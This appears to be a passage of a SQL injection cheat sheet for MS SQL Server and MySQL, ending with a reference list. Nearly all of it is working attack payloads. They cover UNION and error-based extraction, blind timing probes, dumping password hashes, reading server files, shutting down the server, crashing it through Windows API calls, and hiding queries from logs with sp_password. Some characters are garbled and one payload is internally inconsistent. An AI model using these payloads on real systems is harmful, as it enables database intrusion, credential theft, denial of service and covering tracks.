SQL Injection in LIMIT (M) or ORDER (MSO)

SELECT id, product FROM test.test t LIMIT 0,0 UNION ALL SELECT 1,’x'/*,10 ;

If injection is in second limit you can comment it out or use in your union injection
Shutdown SQL Server (S)

When you really pissed off, ‘;shutdown –
Finding Database Structure in SQL Server (S)
Getting User defined Tables

SELECT name FROM sysobjects WHERE xtype = ‘U’
Getting Column Names

SELECT name FROM syscolumns WHERE id =(SELECT id FROM sysobjects WHERE name = ‘tablenameforcolumnnames’)
Moving records (S)

* Modify WHERE and use NOT IN or NOT EXIST,
… WHERE users NOT IN (‘First User’, ‘Second User’)
SELECT TOP 1 name FROM members WHERE NOT EXIST(SELECT TOP 0 name FROM members) — very good one

* Using Dirty Tricks
SELECT * FROM Product WHERE ID=2 AND 1=CAST((Select p.name from (SELECT (SELECT COUNT(i.id) AS rid FROM sysobjects i WHERE i.id<=o.id) AS x, name from sysobjects o) as p where p.x=3) as int

Select p.name from (SELECT (SELECT COUNT(i.id) AS rid FROM sysobjects i WHERE xtype=’U’ and i.id<=o.id) AS x, name from sysobjects o WHERE o.xtype = ‘U’) as p where p.x=21

Fast way to extract data from Error Based SQL Injections in SQL Server (S)
‘;BEGIN DECLARE @rt varchar(8000) SET @rd=’:’ SELECT @rd=@rd+’ ‘+name FROM syscolumns WHERE id =(SELECT id FROM sysobjects WHERE name = ‘MEMBERS’) AND name>@rd SELECT @rd AS rd into TMP_SYS_TMP end;–

Detailed Article : Fast way to extract data from Error Based SQL Injections
Check out references for Advanced SQL Injection by Chris Anley.
Waiting For Blind SQL Injections

First of all use this if it’s really blind, otherwise just use 1/0 style errors to identify difference. Second, be careful while using times more than 20-30 seconds. database API connection or script can be timeout.
WAIT FOR DELAY (S)

This is just like sleep, wait for spesified time. CPU safe way to make database wait.

WAITFOR DELAY ’0:0:10′–

Also you can use fractions like this,

WAITFOR DELAY ’0:0:0.51′
Real World Samples

* Are we ‘sa’ ?
if (select user) = ‘sa’ waitfor delay ’0:0:10′

BENCHMARK (M)

Basically we are abusing this command to make MySQL wait a bit. Be careful you will consume web servers limit so fast!

BENCHMARK(howmanytimes, do this)
Real World Samples

* Are we root ? woot!
IF EXISTS (SELECT * FROM users WHERE username = ‘root’) BENCHMARK(1000000000,MD5(1))

* Check Table exist in MySQL
IF (SELECT * FROM login) BENCHMARK(1000000000,MD5(1))

Covering Tracks
SQL Server -sp_password log bypass (S)

SQL Server don’t log queries which includes sp_password for security reasons(!). So if you add –sp_password to your queries it will not be in SQL Server logs (of course still will be in web server logs, try to use POST if it’s possible)
Clear SQL Injection Tests

These tests are simply good for blind sql injection and silent attacks.

1. product.asp?id=4 (SMO)
1. product.asp?id=5-1
2. product.asp?id=4 OR 1=1

2. product.asp?name=Book
1. product.asp?name=Bo¡¯+¡¯ok
2. product.asp?name=Bo¡¯ || ¡¯ok (OM)
3. product.asp?name=Book¡¯ OR ¡®x¡¯=¡¯x

Some Extra MySQL Notes

* Sub Queries are working only MySQL 4.1+
* Users
o SELECT User,Password FROM mysql.user;
* SELECT 1,1 UNION SELECT IF(SUBSTRING(Password,1,1)=’2′,BENCHMARK(100000,SH A1(1)),0) User,Password FROM mysql.user WHERE User = ¡®root¡¯;
* SELECT … INTO DUMPFILE
o Write query into a new file (can not modify existing files)
* UDF Function
o create function LockWorkStation returns integer soname ‘user32′;
o select LockWorkStation();
o create function ExitProcess returns integer soname ‘kernel32′;
o select exitprocess();
* SELECT USER();
* SELECT password,USER() FROM mysql.user;
* First byte of admin hash
o SELECT SUBSTRING(user_password,1,1) FROM mb_users WHERE user_group = 1;
* Read File
o query.php?user=1+union+select+load_file(0×63…),1 ,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 ,1,1,1,1
* MySQL Load Data inifile
o By default it¡¯s not avaliable !
+ create table foo( line blob );
load data infile ‘c:/boot.ini’ into table foo;
select * from foo;
* More Timing in MySQL
* select benchmark( 500000, sha1( ‘test’ ) );
* query.php?user=1+union+select+benchmark(500000,sha 1 (0×414141)),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1, 1,1,1,1,1,1,1,1,1,1,1
* select if( user() like ‘root@%’, benchmark(100000,sha1(‘test’)), ‘false’ );
Enumeration data, Guessed Brute Force
+ select if( (ascii(substring(user(),1,1)) >> 7) & 1, benchmark(100000,sha1(‘test’)), ‘false’ );

Potentially Usefull Functions

MD5()
SHA1()
CHAR()
PASSWORD()
ENCODE()
COMPRESS()
BENCHMARK()
ROW_COUNT()
SCHEMA()
VERSION()
Second Order SQL Injections

Basicly you put an SQL Injection to some place and expect it’s unfiltered in another action. This is common hidden layer problem.

Name : ‘ + (SELECT TOP 1 password FROM users ) + ‘
Email : xx@xx.com

If application is using name field in an unsafe steored procedure or function, process etc. then it will insert first users password as your name etc.
References

Since these notes collected from several different resources within several years and personal experiences may I missed some references. If you believe I missed yours or someone else then drop me an email, I’ll update it as soon as possible.

* Lots of Stuff
o Advanced SQL Injection In SQL Applications, Chris Anley
o More Advanced SQL Injection In SQL Applications, Chris Anley
o Blindfolded SQL Injection, Ofer Maor ¨C Amichai Shulman
o Hackproofing MySQL, Chris Anley
o Database Hacker’s Handbook, David Litchfield, Chris Anley, John Heasman, Bill Grindlay
o Upstairs Team!

* MSSQL Related
o MSSQL Operators – http://msdn2.microsoft.com/en-us/lib…6(SQL.80).aspx
o Transact-SQL Reference – http://msdn2.microsoft.com/en-us/lib…2(SQL.80).aspx
o String Functions (Transact-SQL) – http://msdn2.microsoft.com/en-us/library/ms181984.aspx
o List of MSSQL Server Collation Names – http://msdn2.microsoft.com/en-us/library/ms180175.aspx
o MSSQL Server 2005 Login Information and some other functions : Sumit Siddharth

* MySQL Related
o Comments : http://dev.mysql.com/doc/
o Control Flows – http://dev.mysql.com/doc/refman/5.0/…functions.html
o MySQL Gotchas – http://sql-info.de/mysql/gotchas.htm